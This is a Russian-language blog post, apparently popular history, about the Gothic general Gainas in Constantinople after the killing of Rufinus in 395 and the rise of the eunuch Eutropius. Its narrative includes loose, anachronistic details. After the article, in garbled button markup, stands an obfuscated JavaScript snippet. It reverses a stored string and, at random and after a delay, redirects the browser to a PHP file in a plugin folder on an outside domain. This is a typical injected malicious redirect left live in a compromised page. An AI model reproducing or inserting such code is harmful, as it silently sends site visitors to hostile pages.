В утробе Скифских народов. Хейна в Царьграде

В то время Руфин стремился стать императором в Восточной Римской империи, а Стилихон стремился убить Руфина и подчинить себе Восточную Римскую империю. Для осуществления этой своей цели Стилихон уговаривает императора Гонория послать войско в помощь своему брату Аркадию для защиты от страданий людей на Востоке. 27 ноября 395 года было послано войско, во главе которого был Хейна (Гайна). Хейна с воинами прибыл в Константинополь. Они убили тирана Руфина и собрали с местных жителей еще дополнительный налог за их освобождение.

Царьград. Константинополь
Царьград. Константинополь

Уходить из Царьграда, из города, который по сути оказался в их руках, ни Хейна, ни его товарищи не спешили. Они видели прежде много городов Европы, многие города были у их ног. Но ничего подобного они не видели во всем мире – и даже Рим, великий Рим не мог сравниться с блеском Царьграда. Сотни дворцов, сотни роскошных бань, бассейнов, фонтанов, парков, павильонов… Грандиозный ипподром, колоссальная статуя основателя города императора Константина, обозревающая узкий пролив, соединяющий два мира: Европу и Азию.

Каждый из воинов Хейны в те времена зажил, как наследник богатого рода. Они снимали или покупали дворцы, скупали местный бизнес. Им надо было что-то делать с теми деньгами, которые нежданно высыпались им на голову. Они любили своего вождя, любили Хейну. Да и было за что: ведь он брал себе ровно столько, сколько и все они. Хотя за ним и оставалось право первого выбора. Поэтому каждый из его воинов мог похвастать тем, что у него столько же денег, сколько и у его командира, римского генерала, скифского князя.

После смерти Руфина власть при дворе в Константинополе перешла к фавориту юного императора Византии Аркадия, евнуху Евтропию. Этот человек подчинил себе волю юного императора, окружив его самыми изысканными красавицами, тонким вином, томной музыкой, и сладким афганским опиумом. И пока юный император, пленник своей неги, утолял свои неутолимые юношеские страсти, Евтропий прибрал к своим рукам всю власть.

Хейна остался тогда в столице на должности военного магистра, которому Евтропий щедро, очень щедро платил. Но Хейна прекрасно знал, что Евтропий ненавидит его и его товарищей-дружинников. Он был обязан им слишком многим – всем. И такие вещи, естественно, не прощались. Да и Хейне, этому бесстрашному воину, повелителю армий, скушно и тошно было смотреть на жирную надменную физиономию Евтропия. Ему так хотелось щелкнуть евнуха по его жирному носу, и Хейна решил, что однажды он сделает это.
Но об этом мы почитаем вскоре. Не уходите далеко, друзья.


tor -->
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}ton__link has-text-color has-very-dark-gray-color has-background» href=»https://zen.yandex.ru/otkritaya_seminariya» style=»background-color:#b9defd»>МОЙ КАНАЛ НА ЯНДЕКС ДЗЕН
6530cookie-checkВ утробе Скифских народов. Хейна в Царьграде

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.